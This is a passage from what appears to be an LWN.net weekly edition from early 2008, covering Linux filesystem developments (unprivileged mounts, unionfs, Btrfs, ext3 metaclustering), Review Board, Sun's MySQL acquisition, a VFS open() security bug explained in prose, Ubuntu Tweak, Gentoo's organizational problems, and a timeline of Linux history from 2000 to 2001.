shortcomings.  Every potential unprivileged mount must be explicitly
enabled via a line in /etc/fstab.  That works well for simple
situations, such as allowing a user to mount a CD or a USB storage device.
When users start wanting to do more complicated things, like mounting their
own special fuse filesystems, the /etc/fstab mechanism breaks
down.  There is a separate, setuid program which grants the right to make
unprivileged fuse mounts, but it represents a workaround rather than a
proper solution.


The current user mount mechanism also requires that the mount
utility be installed setuid root.  Every setuid binary is a potential
security hole, so there is value in eliminating privileged programs when
possible.  The unprivileged mount patch offers the possibility of
eliminating the setuid mount program while simultaneously leaving policy
control in the hands of the system administrator.  So, unless something
surprising comes up, chances are good that this capability will appear in
the 2.6.25 kernel.

		Making code reviews easier with Review Board


Reviewing code is a thankless, but very important, task for any
software project.  For free software projects, the "many eyes make all bugs shallow" aphorism only works if
the eyes actually focus on the code in question.  Review Board is a web-based
application that helps reviewers examine the code, while making it easier
for a developer to track those reviews.


Borne out of frustration with the process of code reviews at VMware, Review
Board has made a great deal of progress since being released last May.  The idea
behind it is to centralize all of the pieces that need to come together for
a review: code diffs, screenshots of UI functionality, comments by other
developers, etc.  On many projects, reviews are handled by email, but that can
be difficult to use; various pieces of the puzzle are spread around in
multiple messages and locations.

 Often a reviewer needs to see more context than a simple email diff
provides or wants to comment on a related section of code that is not
contained in the diff; each requires a reviewer to do more work.  In a
complicated set of changes, ensuring that the developer and any other
reviewers can follow what code the comments pertain to can also be
difficult.  It is these kinds of problems that Review Board is meant to
solve.  

 Review Board presents a side-by-side diff view, shown at right, with
lots of extras, many of which will be familiar to users of other graphical
diff tools.  Changed lines are highlighted in different colors based on
whether they are additions, deletions, or changes.  Changes on a particular
line are highlighted in a slightly darker color so that they can be
distinguished more easily as well.  The numbered tabs along the left edge
provide a link to a reviewer's comments about that section of the code.
This is where Review Board shows that it is much more than just a diff
viewer.  

Using AJAX
techniques, Review Board allows a reviewer to interact very naturally with
the code.  They can highlight a certain section, which will pop up a
text widget that records comments associated with that section of code.
When other reviewers or the developer read those comments, the code snippet
is included, with a link back to the code in the diff view.  Each of these
comments can then be commented upon which allows for a conversation about the
code to develop.


It is not just code that can be annotated; screenshots of application
functionality or bugs can be attached to
reviews, as well. Sections of the screenshot can be highlighted and
commented upon, as shown at left.  This feature is an excellent example of
where a web-based tool can shine; doing the same task in text-based email
would be painful.  Not all projects need it, but those
that do will find it quite useful as anyone who has spent time trying to
describe a UI problem in email will attest.


Inter-diffs is another useful feature that Review Board provides.  Often in
the code review process, several revisions of the original patch are made.
It can be tedious to wade through a large diff, most of which has been
uncontroversial (or resolved earlier) to get to the changes in the area of
interest.  Review Board has the ability to see changes between any two
revisions of the patch, which should reduce much of the hassle. 


Another thing that Review Board does is to assist in managing code
reviews.  When a developer posts something for review, various reviewers
can be notified via email.  Review Board keeps track of that information,
presenting users with a "dashboard" view of their pending reviews, both
those they submitted and those that others have asked them to do.  This
high-level overview is the first screen the user sees when they log on to
the system, shown at right.  This makes keeping track of work that needs to
be done – or
who to prod to get a review moving again – much easier.

 Currently, Review Board best supports the Subversion and Perforce
version control systems (VCS), but support for others, including
distributed VCS Mercurial and git, are being actively developed and are
usable in their current states.  Released under an MIT license, Review
Board is written in Python, using the Django web framework.  Development
is hosted at Google Code; the
developers, 
unsurprisingly, uses the software for internal code reviews.

Other systems to assist in the code review process do exist.  Codestriker is a Perl based
web application that has similar aspirations to Review Board.  Also of
interest is Python founder Guido van Rossum's first project at Google: a code review
system he calls "Mondrian".
It is closely tied to Google proprietary code, though, so it seems unlikely to be
released as free software – though it might make an appearance as a
tool for 
Google Code projects to use. 

 Code reviews are very powerful, but generally painful to perform; any
tool that claims that "Code reviews are fun again!
...almost.", as Review Board does, will be welcomed by many.  It
will be interesting to see whether a code review tracker becomes a standard
part of newer free software projects.  Over the last few years, we have
seen the rise of distributed VCS, bug trackers, and wikis to assist in
distributed development. Will Review Board – or something like it
– be the next tool to be added?  

		State of the unionfs


LWN last looked at the unionfs
filesystem almost exactly one year ago.  Things have been relatively
quiet on the unionfs front during much of that time, but unionfs has not
gone away.  Now the unionfs developers are back with an improved version
and a determined push to get the code into 2.6.25.  So another look seems
indicated.

The core idea behind unionfs is to allow multiple, independent filesystems
to be merged into a single, coherent whole.  As an example, consider a user
with a distribution install DVD full of packages, a small disk, and
painfully slow bandwidth.  It would be nice to keep the DVD-stored packages
around for future installation.  What is also nice, though, is to be able
to keep a directory full of updates from the distributor and use those,
when they exist, in favor of the read-only DVD version.  Using unionfs,
this user could mount the DVD read-only, then mount a writable filesystem
(for the updates) on top of the DVD.  Updated packages go into the writable
filesystem, but all of the available packages are visible, together, in the
unified view.  To avoid confusion, the user could delete obsoleted
packages, at which point they would no longer be visible in the unionfs
filesystem, even though they cannot actually be deleted from the underlying
DVD.  Thus unionfs allows the creation of an apparently writable filesystem
on a read-only base; many other applications are possible as well.


If a user rewrites a file which is stored on a read-only "branch" of a
union filesystem, the response is relatively straightforward: the
newly-written file is stored on a higher-priority, writable branch.  If no
such branch exists, the operation fails.  Dealing with the deletion of a
file from a read-only branch is trickier, though.  In this case, unionfs
will create a "whiteout" in the form of a special file (starting with
.wh.) on a writable branch.  Some reviewers have disliked this
approach since it will clutter the upper branch with those special files
over time.  But it is hard to come up with another way to handle deletion,
especially if (as is the case here) your goal is to keep core VFS changes
to an absolute minimum.


That hasn't kept the unionfs developers from trying, though.  Off to the
side, they have a version of unionfs which maintains a small,
special-purpose partition of its own (on writable storage).  Metadata
(whiteouts, in particular) is stored to this special unionfs partition and no
longer clutters the component filesystems.  There are other advantages to
the dedicated partition scheme, including the ability to include one
unionfs as a branch in a second union; see the unionfs ODF
document for more information on this approach, which the developers
hope to slowly migrate into the version they are currently proposing for
the mainline.


Another persistent problem with unionfs has been coping with modifications
made directly to the component branches without going through the union.  The
January, 2007 version of the patch came packaged with some dire warnings:
direct modification of unionfs branches could lead to system crashes and
data loss.  Given that filesystems which have been bundled into a union
still exist independently, they will always present a tempting target for
modification, even when there is not a specific reason (wanting to put
files onto a specific component filesystem, for example).  So a unionfs
implementation which cannot handle such modifications sets a trap for every
user who uses it.


The developers claim to have solved this problem in the current version of the
patch.  Now, almost every entry into the unionfs code causes it to check the
modification times for the relevant file in all layers of the union.  If
the file turns out to have been changed, unionfs will forget about the file
and reload the information from scratch, causing the most current version
of the file (or directory) to be visible to the user.  This approach solves
the problem in a relatively efficient manner, with one exception: unionfs
cannot tell when a process modifies a file which it has mapped into its
address space with mmap().  So, in that case, changes may not be
visible to processes accessing the affected file through the unionfs.


In both cases, the unionfs developers would really prefer to have better
support from the VFS.  Some operating systems have provided native support
for whiteouts, but Linux lacks that support.  There is also no way for a
filesystem at the bottom of a stack of filesystems to notify the higher
layers that something has been changed.  Fixing either of these would
require significant VFS modifications, though, and the changes might
propagate down into the individual filesystem implementations as well.  So
nobody is expecting them to happen anytime soon.


Another significant change in unionfs is the elimination of the
ioctl() interface for the management of branches.  All changes to
an existing unionfs are now done using the remount option of the
mount command.  This change eliminates the need for a separate
utility for unionfs configuration and makes it possible to do complicated
changes in an atomic manner.


The end result of all this is that the unionfs hackers think that the time
has come to put the code into the mainline.  There, it would become the
second supported stacking filesystem (the first being eCryptfs), and would
help toward the long-term goal of making the VFS layer work better with
stacking.  Some people speak as if the merging of unionfs into 2.6.25 is a
done deal, but that is not yet guaranteed.  Christoph Hellwig, whose
opinion on such things carries a heavy weight, is opposed to the unionfs idea:


	 I think we made it pretty clear that unionfs is not the way to go,
	 and that we'll get the union mount patches clear once the
	 per-mountpoint r/o and unprivileged mount patches series are in
	 and stable.


Unionfs hacker Erez Zadok responds that
unionfs is working - and used - now, while getting union support into the
VFS is a distant prospect.  So he recommends:


	I think a better approach would be to start with Unionfs (a
	standalone file system that doesn't touch the rest of the kernel).
	And as Linux gradually starts supporting more and more features
	that help unioning/stacking in general, to change Unionfs to use
	those features (e.g., native whiteout support).  Eventually there
	could be basic unioning support at the VFS level, and concurrently
	a file-system which offers the extra features (e.g., persistency).


When one looks at a recent posting of the union mount patch, it's hard
to see them as a near-term solution.  As described by its author (Bharata
Rao), this work is in an early, exploratory state; there are a number of
problems for which solutions are not really in sight.  The union mount
approach, which does the hard work in the VFS layer, may well be the right
long-term approach, but it will not be in a state where it can be shipped
to users anytime soon.  


In the end, the problem is a hard one, and unionfs has a considerable lead
toward being a real solution.  That, alone, is not enough to guarantee that
unionfs will make it into the 2.6.25 kernel, but it does help that cause
considerably.  Anybody opposing the merger of unionfs will have to explain
why the union filesystem capability should not be available to Linux users
in 2008.

		A better btrfs


Chris Mason has recently released Btrfs v0.10, which contains a
number of interesting new features.  In general, Btrfs has come a long way
since LWN first wrote about
it last June.  Btrfs may, in some years, be the filesystem most of us
are using - at least, for those of us who will still be using rotating
storage then.  So it bears watching.


Btrfs, remember, is an entire new filesystem being developed by Chris
Mason.  It is a copy-on-write system which is capable of quickly creating
snapshots of the state of the filesystem at any time.  The snapshotting is
so fast, in fact, that it is used as the Btrfs transactional mechanism,
eliminating the need for a separate journal.  It supports subvolumes -
essentially the existence of multiple, independent filesystems on the same
device.  Btrfs is designed for speed, and also provides checksumming for
all stored data.


Some kernel patches show up and quickly find their way into production
use.  For example, one year ago, nobody (outside of the -ck list, perhaps) was talking
about fair scheduling; but, as of this writing, the CFS scheduler has been
shipping for a few months.  KVM also went from initial posting to merged
over the course of about two kernel release cycles.
Filesystems do not work that way, though.
Filesystem developers tend to be a cautious, conservative bunch; those who
aren't that way tend not to survive their first few encounters with users
who have lost data.  This is all a way of saying that, even though Btrfs is
advancing quickly, one should not plan on using it in any sort of
production role for a while yet.  As if to drive that point home, Btrfs
still crashes the system when the filesystem runs out of space.  The v0.10
patch, like its predecessors, also changes the on-disk format.


The on-disk format change is one of the key features in this version of the
Btrfs patch.  The format now includes back references on almost all objects
in the filesystem.  As a result, it is now easy to answer questions like
"to which file does this block belong?"  Back references have a few uses,
not the least of which is the addition of some redundant information which
can be used to check the integrity of the filesystem.  If a file claims to
own a set of blocks which, in turn, claim to belong to a different file,
then something is clearly wrong.  Back references can also be used to
quickly determine which files are affected when disk blocks turn bad.


Most users, however, will be more interested in another new feature which
has been enabled by the existence of back references: online resizing.  It
is now possible to change the size of a Btrfs filesystem while it is
mounted and busy - this includes shrinking the filesystem.  If the Btrfs
code has to give up some space, it can now quickly find the affected files
and move the necessary blocks out of the way.  So Btrfs should work nicely
with the device mapper code, growing or shrinking filesystems as conditions
require.


Another interesting feature in v0.10 is the associated in-place ext3
converter.  It is now possible to non-destructively convert an existing
ext3 filesystem to Btrfs - and to go back if need be.  The converter works
by stashing a copy of the ext3 metadata found at the beginning of the disk, then
creating a parallel directory tree in the free space on the filesystem.  So
the entire ext3 filesystem remains on the disk, taking up some space but
preserving a fallback should Btrfs not work out.  The actual file data is
shared between the two filesystems; since Btrfs does copy-on-write, the
original ext3 filesystem remains even after the Btrfs filesystem has been
changed.  Switching to Btrfs forevermore is a simple matter of deleting the
ext3 subvolume, recovering the extra disk space in the process.


Finally, the copy-on-write mechanism can be turned off now with a mount option.  For
certain types of workloads, copy-on-write just slows things down without
providing any real advantages.  Since (1) one of those workloads is
relational database management, and (2) Chris works for Oracle, the
only surprise here is that this option took as long as it did to arrive.
If multiple snapshots reference a given file, though, copy-on-write is
still performed; otherwise it would not be possible to keep the snapshots
independent of each other.


For those who are curious about where Btrfs will go from here, Chris has
posted a
timeline describing what he plans to accomplish over the coming year.
Next on the list would appear to be "storage pools," allowing a Btrfs
filesystem to span multiple devices.  Once that's in place, striping and
mirroring will be implemented within the filesystem.  Longer-term projects
include per-directory snapshots, fine-grained locking (the filesystem
currently uses a single, global lock), built-in incremental backup support,
and online filesystem checking.  Fixing that pesky out-of-space problem
isn't on the list, but one assumes Chris has it in the back of his mind
somewhere.


		ext3 metaclustering


The ext3 system uses the classic Unix block pointer method for keeping
track of the blocks in each file.  For a given file, the on-disk inode
structure contains space for twelve block numbers; they point to the first
twelve blocks in the file - the first 48KB of space.  If the file is larger
than that, a 13th pointer contains the address of the first indirect
block; this block contains another 1024 (on a 4K block filesystem)
block pointers.  Should that not suffice, there's a 14th pointer for the
double-indirect block - each entry in that block is the address of an
indirect block.  And if even that is not enough, there's a 15th entry
pointing to a triple-indirect block full of pointers to double-indirect
blocks. 


This is a very efficient representation for small files - the kinds of
files Unix systems typically held, once upon a time.  In current times, when one can forget
about that directory full of DVD images and never even notice the lost
space, it does not work quite as well - there is a lot of overhead for all
of those individual block pointers, and a large data structure to manage.
That is why removing a large file on an ext3 filesystem can take a long
time - the system has to chase down all of those indirect blocks, which, in
turn, forces a lot of disk activity and head seeks.  For this reason,
contemporary filesystems tend to use extent-based mechanisms to associate
blocks with files, but that is not really an option for ext3.


An additional problem with all those indirect blocks is that filesystem
checkers must locate and verify them all.  That, again, causes a lot of
head seeking and makes fsck run slowly.  Slow filesystem checking was the
motivation behind this patch from
Abhishek Rai which attempts to improve performance on filesystems with
a lot of indirect blocks.


The approach taken is relatively simple: the patch just tries to group 
indirect block allocations together on the disk.  The current ext3 code
will allocate indirect blocks when they are needed to account for data
blocks being added to the file; they are usually placed adjacent to those
data blocks.  One might think that this placement would speed subsequent
accesses to the file, but that is not necessarily so; the reading or
writing of the indirect block will tend to happen at a different time than
operations on the data blocks.  What this placement does accomplish,
though, is the distribution of the indirect blocks all over the disk.  So a
process which must examine all of the indirect blocks associated with a
file must cause the disk to do a lot of head seeks.


The "metaclustering" approach works by reserving a set of contiguous
blocks at the end of each block group.  Whenever an indirect block is
needed, the filesystem tries to get one from this dedicated area first.
The end result is that all of the indirect blocks are located next to each
other.  Should somebody need to read a number of those blocks without being
interested in the contents of the data blocks, they can grab them all
quickly with minimal seeking.  Filesystem checkers, as it happens, need to
do exactly that - as does the file removal process.  The patch did not come
with benchmarks, but the speedup that comes from the elimination of all
those seeks should be significant.

Even so, Andrew Morton questioned the need
for this patch, worrying that its benefits do not justify the risks that
comes with modifying an established, heavily-used filesystem:


	In any decent environment, people will fsck their ext3 filesystems
	during planned downtime, and the benefit of reducing that downtime
	from 6 hours/machine to 2 hours/machine is probably fairly small,
	given that there is no service interruption.


Others disagreed, though, noting that it's the unplanned filesystem
checks which are often the most time-critical.  That includes the
delightful "maximal mount count" boot-time check which, in your editor's
experience, always happens when one is trying to get set up to give a talk
somewhere.  So this patch might just find eventual acceptance - it should
be relatively low-risk and does not require any on-disk format changes.
This is a filesystem patch, though, so nobody will be in any hurry to get
it into the mainline before a lot of testing and review has been done.

		SAMP?


A few articles making predictions for 2008 had put an initial public
offering by MySQL on their list.  The company had clearly been heading in
that direction for a while; sales were growing, venture capital was coming
in, etc.  In the end, though, the MySQL IPO seems destined not to happen -
Sun Microsystems got
there first.
The deal is structured as a full acquisition - Sun will pay about
$800 million for all outstanding shares of MySQL stock.  In addition,
about $200 million in options will be covered, so, overall, this is a
billion-dollar deal.  Not bad for a company which is based on free
software. 


Sun is making the right noises about how this deal will work.  There is no
talk of taking MySQL proprietary or changing its license.  MySQL will
continue to be supported on all platforms, and not just Solaris.  A series
of grants will be made to help university researchers advance the state of
the art in database management systems.  There is a lot of talk about
continuing to support "the community," though details are (perhaps
necessarily) scarce.  CEO Jonathan Schwartz says
that Sun will be working to improve "the rest of the LAMP" stack, though he
says nothing about the "L" (for Linux) part.


Chances are that this deal will be a good thing for MySQL users.  Sun is
clearly making MySQL an important part of its overall strategy (in these
days, one does not toss $1 billion toward unimportant objectives) and
can be expected to continue - or accelerate - development of the system.
Sun's free software orientation is strong enough that the chances of parts
or all of MySQL going proprietary seem small.  Indeed, nothing in Sun's
releases says anything about MySQL's commercial licensing business; the
emphasis appears to be strongly on support and services.  So MySQL might
just become even more open than it is now.


Sun appears to be positioning itself to compete strongly with Oracle.  Both
companies are working hard to be able to offer the entire software stack to
their customers.  So Oracle's push into the Linux distribution business and
Sun's database venture are both aimed at having the same story for their
sales staff to tell: we, in some way, own and control all of the software
you are looking to run.  No problems with incompatibilities,
finger-pointing, etc.  As an added bonus, Sun will happily sell you the
hardware you need too.  Do expect an increase in efforts aimed at moving
MySQL users away from the (Oracle-owned) InnoDB engine, though.


For Sun to sell that story, though, it will to have  continue to push
Solaris hard as an alternative to Linux.  Either that, or the company will
eventually find itself shopping for a Linux distributor of its own.  Either
way, it seems likely that competitive pressures for operating systems (and
higher layers) sales and support are set to increase, especially in the
high-performance web server area.  Red Hat, whose PostgreSQL-based database
offering appears to have fallen below the radar, may find itself scrambling
for a response.


Sun makes a big point of being able to sell the entire package, and there
is some truth to that.  Processors, storage, systems software, database
software, programming languages, office suites, and more can all be had
from one company.  What remains to be seen is whether this is really what
customers want.  There is a lot of value in being able to integrate
components from multiple sources and not being dependent on a single
vendor.  Your editor, who managed a transition from being an all-DEC shop
to an all-Sun shop some twenty years ago, is not convinced that those days
are worth going back to.

		A kernel security hole


Security holes can sneak into code in surprising ways, even in highly
scrutinized codebases.  Perhaps even more surprising is how long they can
persist in something as popular as the Linux kernel before someone
notices.  The release of stable
kernels 2.6.22.16 and 2.6.23.14 this week are instructive for both of
those reasons.


The bug that led to the releases is fixed by a two
line patch, but might be exploitable to cause filesystem corruption.
If it were a bug in a driver for an obscure piece of hardware,
with relatively few users, it might have been less eye opening, but it was
in the Virtual File System (VFS) layer of the kernel.  VFS is the
abstraction that allows all kernel filesystems to be used identically
regardless of their underlying implementation.  The open() system
call is used to open any file on any type of filesystem; VFS is what makes
that work.


In fact it is the open() path that is affected by the bug.
Due to a faulty test, the bug allows directories to be opened for writing, which is generally a
recipe for disaster.  It could also allow a file on a read-only filesystem
to be opened for writing – depending on the underlying filesystem
implementation, that could lead to corruption.  In both cases, they are
only locally exploitable.


The bug was introduced in a change to support NFS in October of 2005 – more
than two years ago; all kernels since 2.6.15 are affected.  The change
was aimed at making NFSv4 open calls be atomic (because an open is really a
lookup followed by an open), but also did some code reorganization that
changed the semantics of a flag variable.  That variable was being used to
determine the access mode for directories and read-only filesystems, so
that change subtly broke the tests.


Part of the problem is that the tests are in a function called
may_open(), which takes two flag parameters:

The incorrect code was using flag in the tests when it should have
been using acc_mode.  Each of them is a bitmask of values that, on
first glance, might be easy to confuse – each is related to permissions.
The bit values for each have names like FMODE_WRITE and
MAY_WRITE, which would seem to have a fair amount of overlap. This
may explain why the problem was not spotted at the time it was introduced.


There may be no easy solution to this kind of problem – other than
more scrutiny.  Using different types, rather than plain int, for
each flag might have helped, but since the tests were using the right kind
of bit values for flag, that is a somewhat hard sell. 


Something unpleasant to consider in all of this is that this may not be the
first time this problem has been noticed.  It may just have been the first time
it was noticed by someone who reported it.  Folks with a malicious intent
are much less inclined to report bugs.  This particular bug is not one that
would be particularly useful to attackers, but we would do well to remember
that fixing a two year old hole means that systems were vulnerable for all
that time.  It is not only the good guys who can read code.


		Use Ubuntu Tweak to adjust hidden GNOME options


Ubuntu Tweak
is a GNOME desktop configuration tool that works with
versions 7.04 and 7.10 of the Ubuntu distribution.
From the application's splash screen:


This is a tool for Ubuntu which makes it easy to change hidden system and
desktop settings.  Ubuntu Tweak is currently only for the GNOME Desktop
Environment.


Version 0.2.4 of Ubuntu tweak was

announced in December, 2007:
"With many bugs fixed and two language added, the stable version of Ubuntu Tweak 0.2.4 released!"


Installation was trivial, the .deb file was
downloaded
in the Firefox web browser; that, in turn, allowed the installer application
to be run.  A minute later, the software was ready to go.
The application was automatically added to the GNOME
Applications/System Tools pulldown menu.


So, what can Ubuntu Tweak do?
There are a number of top-level icons, some with multiple sub-icons.
Top-level categories include: Computer, Startup, Desktop, System and
Security.  Clicking on the Computer icon reveals useful information
such as the hostname, distribution version, kernel rev, platform, CPU
type and speed and memory capacity.  The username, home directory, shell and
default language are also displayed.
The Startup icon allows the user to toggle features such as the
automatic saving of session changes, the logout prompt, remote
TCP connections and the splash screen.


The Desktop icon allows numerous features to be adjusted on the
Desktop Icon Settings, the Metacity window manager, Compiz Fusion,
the GNOME panel and menu and the Nautilus file browser.
The System icon has toggles and sliders for controlling various
power management parameters.  Lastly, the Security option has
toggles for disabling the Run Application dialog, the Lock Screen,
Printing, Printer Setup, Save to Disk and User Switching.


That's about all there is to this version of Ubuntu Tweak,
there is room to add many more control options.
Ubuntu Tweak seems like a useful tool for managing options that don't
really fit anywhere else on the desktop environment.
The only surprise is that this is, by name, only useful for
the Ubuntu distribution.  It seems as though making a multi-distribution
GNOME-tweak would not require many changes to the code.


		Is Gentoo in crisis?


  It all started with a blog post
  by Daniel Robbins. That was on January 11. But of course, it didn't really
  start there. That's just when the internal furor over the revocation of the
  Gentoo Foundation's corporate license became public. Developers had been
  trying to figure out what to do in the internal gentoo-core mailing list
  for about a week, and as such things do, it leaked.


  The larger-scale problems didn't even start there. The Gentoo Weekly
  Newsletter hasn't been posted for 13 weeks, and the Gentoo homepage hadn't seen any changes in the
  same amount of time. Furthermore, Gentoo's second release of 2007, dubbed
  2007.1, never happened and on Monday was announced canceled.


  What do these problems mean? Is Gentoo collapsing? Another blog
  post by Daniel Robbins suggests part of the answer—serious
  communication problems exist between developers and the rest of the Gentoo
  community. The relevant aspect here is that developers are so focused on
  working in their little areas that they fail to tell the world what they're
  doing. Everyone wants to develop, and nobody wants to spend time telling the
  world what's being developed. Most developers don't want to spend time doing
  anything but develop. In the same way, developers don't enjoy spending time
  dealing with "boring" issues like donations, copyright, tax returns, etc.,
  nor are they generally any good at it.


  Development remains active in the background—new versions of packages
  appear, bugs are fixed, the gentoo-dev mailing list is quite active, and so
  is IRC. Developers continue to blog on Planet Gentoo. But none of that is
  apparent to Gentoo users, who go to the homepage, read the weekly
  newsletter, and wait for the next release. To users, things can look like
  they're in stasis.


  That's where Gentoo needs to concentrate its efforts: telling the world what
  developers are doing. To accomplish that, the project will either need to
  find new contributors interested in doing this or streamline its processes
  so that less effort is required to communicate (for example, automatically
  including Planet information or new versions from packages.gentoo.org on the
  homepage). Specifically, one hope with the foundation is to hand off the
  work to people who enjoy dealing with it, so developers can concentrate on
  development—people at Software in the Public Interest, or the Software
  Freedom Conservancy. An announcement on the Gentoo homepage proposing a move
  to a monthly newsletter brought nearly 20 offers of help in only 2 days, so
  it may be that the project hasn't been looking for non-development help in
  all the right places.


  Gentoo isn't dying, but its developers need to tell that to the world.


		Ten-year timeline part 3: The Tucows years


This is the third installment in a ten-year retrospective inspired by LWN's
tenth anniversary; those who have not yet seen them may want to have a look
at Part 1 and Part 2.  At the end of the
second part, LWN had just emerged from the peak of the dotcom bubble having
made a deal with Tucows.  For almost two years we operated as a part of
that company; here's some highlights from that time.


 April 13, 2000: Linuxcare 
     postpones its IPO indefinitely and rearranges its management.  Minix
     is released as free software.

 April 20, 2000: Linux
     Business Expo in Chicago.  Microsoft's FrontPage back door is exposed.
     Devfs flame wars continue.  Red Hat fired by its ad agency.  Shares of
     Caldera, VA Linux Systems and Andover.Net all fall below their IPO
     prices. 

 April 27, 2000: Oracle
     creates Miracle Linux in Japan.  Red Hat launches its embedded
     developer's kit.

 May 4, 2000: Linuxcare
     lays off 35% of its staff and officially cancels its IPO.


Needless to say, by this time we were happy to have found a relatively
stable place to be - times were starting to look a little tough.  Between
the end of the Linuxcare IPO - once supposed to be the biggest and best of
them all - and the fact that other Linux companies had fallen below their
initial prices, it seemed that the honeymoon was pretty well over.  By this
time, LWN's revenue stream from advertising had pretty well dried up too.


Red Hat's embedded business is a classic case of a lost opportunity.  The
acquisition of Cygnus should have placed Red Hat in a strong position in
this sector, but, somehow, it all slipped away.


 May 11, 2000: Red Hat
     changes direction, dumps its news site, and jumps into the venture
     capital business.  The first public BitKeeper release happens.  The
     Free Standards Group is formed.

 May 18, 2000: Rumors of
     Wine 1.0.  IBM releases the S/390 port.  Memory management problems
     plague the pre-2.4 development kernels.


One might think it cynical and mean-spirited to point out that we're still
waiting for Wine 1.0.  But we'll do it anyway.  The memory management
issues with 2.4 were to be with us for some time, as it turned out.


 May 25, 2000: The Linux
     Mall and EBIZ merge.  Lineo files for an IPO.  Eric Raymond decides to
     rewrite the kernel configuration system.

 June 8, 2000: A fight over
     whether Reiserfs should go into the 2.4 kernel.

 June 22, 2000: British
     telecom claims to own a patent on linking and starts suing ISPs for
     being part of the world wide web.  2.4.0 test kernels come out in two
     flavors with different memory managers.  More Reiserfs flames.


Given that the 2.4.0 release was far overdue, one would think that
arguments over whether a completely new filesystem should be added would be
considered out of place.  But they did happen, with Hans Reiser showing 
a level of
anger and paranoia that put much of the community off of dealing with
him for years.  It is rare that kernel developers are accused of putting
corporate interests above those of the kernel as a whole, but that happened
here. 

It is actually worth reflecting on this a bit: kernel developers work for
roughly 200 companies, many of which are direct competitors.  But that
competition has remained almost entirely absent from the development
process.  We are very good at developing common resources in a highly
collaborative way while competing at different levels.


 June 29, 2000: MySQL
     switches to the GPL, moves to SourceForge.  2.4.0-test2
     is officially blessed with penguin pee.

 July 20, 2000: Miguel de
     Icaza proclaims that "Unix sucks" at OLS.  Sun releases StarOffice
     under the GPL.  Rumors circulate that Caldera might acquire SCO; if
     only we'd known where that would go.
     Larry Wall announces that Perl 6 will be a complete rewrite of
     the language.  If only we'd known where that would go - or not go.  A
     set of locking changes goes into the 2.4.0-test kernel - which is
     allegedly stabilizing for release.

 August 3, 2000: Copyleft
     is sued by the DVDCCA for putting the DeCSS code on T-shirts.
     Caldera's acquisition of SCO's Unix business (and name) becomes
     official. 

 August 17, 2000: The GNOME
     Foundation is formed.  Debian 2.2 ("potato") is released.

 August 24, 2000 KDE/GNOME
     flame wars break out anew.  Eric Raymond strongly
     criticizes Linus's management practices.  VA Linux claims that
     SourceForge hosts "over 76%" of the world's free software.
     Caldera/SCO announces the "Linux and Unix marriage" - something it
     will wish to annul later on.


Something which was widely understood, but little talked about, during this
time was the great amount of effort VA Linux put into recruiting projects
to SourceForge.  It was a clear effort to become the home for as much
software as possible.  Quite a few prominent projects moved over with great
fanfare, only to drift away more quietly later on.  SourceForge still hosts
a great many projects, but it is seen by many now as a home of last resort.


 August 31, 2000: The Open
     Source Development Lab announces its existence.
     <!-- geeks with guns -->

 September 7, 2000:
     Trolltech releases Qt under the GPL.  The CueCat saga begins.  The RSA
     patent is released into the public domain - two weeks before it
     expires.


Lest anybody think that the dotcom silliness was truly over by this point,
the CueCat story should convince them otherwise.  Digital Convergence spent
many millions of dollars sending around free barcode scanners on the idea
that people would want to swipe codes from advertisements and be taken to
the associated web site.  This company considered using the scanner for any
other purpose to be a violation of the DMCA, and made loud threats at
people distributing drivers which enabled such uses.  The company's threats
came to nothing, but they foreshadowed the DMCA follies to come.


 September 14, 2000: Linus
     decrees
     that the kernel is licensed under version 2 (only) of the GPL.

 September 21, 2000: Sun
     acquires Cobalt Networks.  Caldera dumps $3 million into EBIZ.
     Linus proclaims the kernel to be in "final freeze," with only critical
     fixes being accepted.

 September 28, 2000: the
     Red Hat Network launches.  Red Hat 7 is released, featuring
     "gcc-2.96," a release which the GCC project never made.


The Red Hat Network was the core of what was to become the subscription
services which support the company so nicely now.  Back then, though, that
outcome still was not clear, and Red Hat continued to experiment with a
number of business ideas.


 October 26, 2000: KDE 2.0
     is released.  LynuxWorks files for an IPO.

 November 2, 2000:
     Turbolinux files for an IPO.  Linuxcare shuts down its European
     operation.  Linus describes the 2.4.0-test10 kernel as having "no known
     bugs." 

 December 7, 2000: The
     2.4.0-test12 prepatches include the new PA-RISC architecture and
     rework of the task queue API - both of which, apparently, were fixes
     for critical problems.  EBIZ tells its shareholders that things will
     get better soon, honest.

 December 21, 2000: Corel
     sells its Linux business to (what becomes) Xandros.  
     <!-- M. Hammel -->

 January 11, 2001: the
     2.4.0 kernel is released at last.  Linus warns that it's not yet open
     season for new patches.  The first SELinux prototype is released.


Many people had begun to worry that 2.4.0 would never come.  The story of
the development of this kernel, though, was not done yet.


 January 18, 2001: The
     Ramen worm attacks Red Hat Linux systems.  Turbolinux and Linuxcare
     agree to merge.  Lineo withdraws its IPO application.  VA Linux warns
     that earnings will not be up to expectations.  Helix Code gets
     $15 million in venture investments.  The InterBase backdoor is
     discovered.  Reiserfs gets merged for the 2.4.1 kernel.  The first
     linux.conf.au happens.

 February 8, 2001: SUSE
     (still SuSE then) lays off most of its US staff.

 February 22, 2001: VA
     Linux lays off 25% of its staff, gets a new CEO.  Turbolinux cancels
     its IPO.  Microsoft's Jim Allchin calls Linux "un-American".

 March 15, 2001: Eazel
     releases Nautilus 1.0, lays off half its staff.

 March 22, 2001: The
     Stanford Checker surfaces with a long list of potential kernel bugs.
     EBIZ announces a plan to acquire Linux NetworX.


By this point, things were looking downright scary.  During the bubble
days, almost anybody who wanted to work in free software development could
get a job somewhere.  By this point, though, quite a few people were
without jobs and some of them were leaving the community altogether.

The Stanford Checker was a GCC derivative which could do static analysis;
for many, it was the first real demonstration of what that kind of tool
could do.  Despite some early reassurances, this code was never released;
instead, it was used to found Coverity.  The community has benefited
strongly from Coverity's work, but imagine what we could have done with the
source to the Checker.  It is a little sad that we have been unable to
develop similar capabilities in free software.


 April 5, 2001: Wind River
     Systems buys BSDi.  The first kernel
     summit is held.  Alan Cox states that the 2.4 kernel is not yet
     stable.  Larry Wall begins to post the design of Perl 6.
     <!-- slackware staff -->

 April 19, 2001: Wind River
     Systems lays off the Slackware staff.  MandrakeSoft starts asking for
     donations from users.

 April 26, 2001: Ed Felten
     receives DMCA threats over his breaking of the Secure Digital Music
     Initiative watermarking scheme.  Eric Raymond proclaims his intent to
     hack the kernel's social systems.


The threats against Ed Felten - who had participated on a contest put on by
SDMI proponents - were a strong signal that, in the U.S., the DMCA could
bite developers hard.  Worse was to come, though.  Meanwhile, Eric
Raymond's attempts to "hack" a rather unimpressed kernel community provided
a steady stream of comic relief.


 May 3, 2001: Turbolinux
     and Linuxcare cancel their merger.  VA Linux posts horrific quarterly
